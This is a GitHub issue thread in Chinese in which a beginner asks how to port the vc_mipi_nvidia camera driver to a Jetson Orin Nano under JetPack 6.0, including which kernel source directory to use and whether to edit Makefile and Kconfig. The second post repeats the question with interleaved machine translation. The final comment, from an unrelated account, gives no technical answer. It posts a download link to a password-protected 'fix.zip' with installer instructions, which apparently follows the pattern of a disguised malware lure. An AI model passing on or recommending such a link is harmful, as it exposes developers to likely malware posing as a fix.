VC-MIPI-modules/vc_mipi_nvidia #117: orin nano 如何移植这个模块

lipingioiopeter, 2024-08-28:
IDE：jeston 36.0
JetPack6.0
core board：orin Nano4GB
board：Jetson Orin Nano Developer Kit
kernel source: [Jetson Linux 36.3 | NVIDIA Developer](https://developer.nvidia.com/embedded/jetson-linux-r363)
rootfs source: Basic Flavor Root File System [Root File System — NVIDIA Jetson Linux Developer Guide 1 documentation](https://docs.nvidia.com/jetson/archives/r36.3/DeveloperGuide/SD/RootFileSystem.html)
我是一位初学者，最近项目中用到了imx477摄像头，在查找资料时，发现有人使用vc-mipi-nvidia实现摄像头驱动。
我根据 [VC-MIPI 模块/vc_mipi_nvidia：适用于 NVIDIA Jetson Nano、Xavier NX、AGX Xavier、TX2 和 Orin Nano、Orin NX 的视觉组件 MIPI CSI-2 驱动程序 (github.com)](https://github.com/VC-MIPI-modules/vc_mipi_nvidia)这个网站指导进行移植，这个教程中有一部分说的是将驱动程序集成到自己的BSP中，在移植中发现如下问题：
1.按照教程，我将设备树拷贝到/hardware/nvidia/t23x/nv-public/overlay路径下，但是他的第三部将所有驱动文件拷贝到 **/kernel/nvidia/drivers/media/i2c 路径下，在我实际内核中并没有这个路径只有：Linux_for_Tegra/source/kernel/kernel-jammy-src/drivers/media/i2c，同时还找到一个路径Linux_for_Tegra/source/nvidia-oot/drivers/media/i2c，我需要将该文件拷贝到那个路径？还是这两个路径都不对？
2.如果我将这个文件拷贝到了对应位置，是否需要修改Makefile 和 Kconfig？

lipingioiopeter, 2024-08-28:
> IDE：jeston 36.0 IDE：杰斯顿36.0 JetPack6.0 喷气背包6.0 core board：orin Nano4GB 核心板：orin Nano4GB board：Jetson Orin Nano Developer Kit开发板：Jetson Orin Nano 开发套件 kernel source: [Jetson Linux 36.3 | NVIDIA Developer](https://developer.nvidia.com/embedded/jetson-linux-r363)内核源码： [Jetson Linux 36.3 |英伟达开发商](https://developer.nvidia.com/embedded/jetson-linux-r363) rootfs source: Basic Flavor Root File System [Root File System — NVIDIA Jetson Linux Developer Guide 1 documentation](https://docs.nvidia.com/jetson/archives/r36.3/DeveloperGuide/SD/RootFileSystem.html)rootfs 来源：Basic Flavor 根文件系统[根文件系统 — NVIDIA Jetson Linux 开发人员指南 1 文档](https://docs.nvidia.com/jetson/archives/r36.3/DeveloperGuide/SD/RootFileSystem.html) 我是一位初学者，最近项目中用到了imx477摄像头，在查找资料时，发现有人使用vc-mipi-nvidia实现摄像头驱动。 我根据 [VC-MIPI 模块/vc_mipi_nvidia：适用于 NVIDIA Jetson Nano、Xavier NX、AGX Xavier、TX2 和 Orin Nano、Orin NX 的视觉组件 MIPI CSI-2 驱动程序 (github.com)](https://github.com/VC-MIPI-modules/vc_mipi_nvidia)这个网站指导进行移植，这个教程中有一部分说的是将驱动程序集成到自己的BSP中，在移植中发现如下问题： 1.按照教程，我将设备树拷贝到/hardware/nvidia/t23x/nv-public/overlay路径下，但是他的第三部将所有驱动文件拷贝到 **/kernel/nvidia/drivers/media/i2c 路径下，在我实际内核中并没有这个路径只有：Linux_for_Tegra/source/kernel/kernel-jammy-src/drivers/media/i2c，同时还找到一个路径Linux_for_Tegra/source/nvidia-oot/drivers/media/i2c，我需要将该文件拷贝到那个路径？还是这两个路径都不对？ 2.如果我将这个文件拷贝到了对应位置，是否需要修改Makefile 和 Kconfig？

closed 2024-08-28 by lipingioiopeter

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."